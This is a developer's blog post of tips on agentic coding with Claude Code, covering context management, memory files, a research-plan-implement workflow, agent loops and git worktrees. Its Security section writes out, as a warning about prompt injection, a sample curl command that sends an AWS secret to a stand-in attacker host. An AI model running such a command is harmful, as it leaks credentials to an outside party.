Agentic Coding Data Dump
20 February, 2026
LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some non-linear data points about the current meta, the examples are with with claude.
LLM Amnesia
LLMs are stateless. New session, new context window.
Context Engineering
Context engineering is having the most relevant tokens in the context window for a defined task. LLMs struggle with recall in large context windows, so strive to reset at the 40%–50% mark.
Useful cheatsheet:
- To visualize your context window, run the
/contextcommand. - For Claude Code, you can run the
/clearcommand to reset the context window. - Opinionated, but I prefer to disable the
/compactfeature to control what gets compacted in the context window. - Use
/resumeto resume a previous conversation (saves convos according tocwd). /initto generate aCLAUDE.mdfile.
Set up a custom status line to view your context percentage in real time.
Protect Your Context
The input tokens you and your agent feed the LLM will determine its performance. View your initial new session usage percentage via the /context command. Keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant. Having stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. It's also worth noting that because of how LLMs work via next-token prediction, don't ever argue with it, it just encourages statistically bad behavior. Instead, create a handoff and start over.
Layered Knowledge
When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.
In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions in the packages/backend/../db/migrations/CLAUDE.md path rather than in the root of the project.
You can generate these files by running the /init command. Be sure to keep them updated. There is a skill for that.
Security
Agents cannot be trusted, and LLMs are vulnerable to prompt injections. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can run malicious commands (such as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD) and you are pwned. Be warned: the dev machine is an attack surface.
ERPI - Epic, Research, Plan, Implement Methodology
Epic
The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Tools like wisperflow are nice but for a while I was just voice recording on Whatsapp and transcribing the .ogg files to text.
Research
Send a coding agent to explore and research the current codebase and relevant documentation. Review and validate the output. Research should represent the state of the current codebase and not implementation suggestions. Be wary of this, a strategy to avoid this is generating a list of research questions based on the initial epic.md and then sending the agent off to research without any context of "why" it is researching.
Plan
The implementation plan is generated by combining research_output.md and epic.md. Review and refine the implementation plan so it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity. Remember YAGNI while ensuring the system stays extendable.
Notes before the implementation step
Non Deterministic coding agents thrive with determinism. You can accidentally steer a model in the wrong direction. You cannot accidentally steer a type checker. Ask claude "is this code good?" and it says something entirely different every time. Same model, same code. Type checkers, unit tests, linters, give the model deterministic feedback.
Time spent on building the tooling infrastructure compounds as a codebase grows, worth investing in some time to setup.
Implement
Once plan is prepared and reviewed, send off the coding agent and wait for this asynchronous task to complete. To avoid permissions fatigue, run the agent in a sandboxed environment where you can let it skip permissions. If not possible, configure a solid set of permissions & purchase a giant enter button from China like I did.
Tips on Iterating on the Spec
Specs are contracts, When iterating over the markdown outputs I leave XML annotations before feeding them back to the LLM to revise. I also recommend git stage the previous draft to diff review it after changes to confirm that you haven't lost critical spec information.
# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>
Real Example from one of my codebases
Ralph Wiggum Loop
Agent control-flow. Running Coding agents in for-loops is a simple yet surprisingly effective method of managing context and completing large tasks.
Pseudo bash
for ((i=1; i<=prds.length; i++)); do
result=$(claude -p "@prd.json @progress.txt \
1. Pick the highest-priority unfinished feature
and implement only that one. \
2. Update the PRD and append progress
to progress.txt for the next developer. \
3. Git commit the feature. \
If the PRD is complete, output <promise>COMPLETE</promise>.")
echo "$result"
[[ "$result" == *"<promise>COMPLETE</promise>"* ]]
&& echo "PRD complete, exiting." && exit 0
done
Pseudo prompt
Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills,
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.
Pseudo tasks.json
[{
"task_description":
"Add Dark mode Button",
"steps_to_verify": [
"CSS mode changes",
"Icon toggles",
"Theme state persists through"
],
"passes": false
}]
Parallelism and Git Worktrees
Git has a built-in feature that has become very popular. Worktrees allow you to check out multiple branches from the same repository into separate directories simultaneously. This allows coding agents to work on features without stepping over each other. That's how Vibe Kanban / Cursor Agents works under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.
Closing Notes
Much of what I know comes from watching from watching the best, playing around and just being curious, so go out there and get your hands dirty, run a ralph loop, write your own agent, and try tools but keep your setup simple and manageable and burn all your tokens!
- Tracer bullets: Small pieces of functionality built end-to-end to validate that what you are going to do on a large scale is even possible with your approach, read more about it here!
- MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it could be beneficial to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom
/get-ticket.shscript. - Terminal multiplexers are cool: I use tmux, here's a setup blog.
- Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
- Learning tests is code you write not to build a feature, but to prove how an external system behaves. When working with closed source APIs/Tools/Binaries you can ask the agent to create a test to confirm behavior, interfaces can change so checking and committing these tests in your CI could be beneficial for critical third party dependencies.
- Propagating assumptions created during research will propagate through planning and implementation stages. A wrong assumption discovered at implementation forces you to redo everything upstream. Learning tests catch these early, when the cost of being wrong is cheap.
Happy Prompting!
Link dump:
- this post repo reference files and more
- Agent ping pong
- Ralph Wiggum - Geoffrey Huntley
- Agent autonomy
- Don't waste your back pressure
- Open University Grade Checker
- Simple Bash Agent
- What Is Sovereign AI? | NVIDIA Blog
- AI Hero
- BAML
- Gastown
- WebMCP
- humanlayer
- Haflow - A local fullstack webapp control panel for orchestrating containers
- Understanding LLM Inference Engines: Inside Nano-vLLM
- Vibe Kanban
- Fully automatic censorship removal for language models
- Agentic Engineering Patterns
- Large Scale Online Deanonymization
- AI Fatigue Is Real
- Kardashev Scale
- Wisprflow
- Mercury 2 - LLMs that are powered by diffusion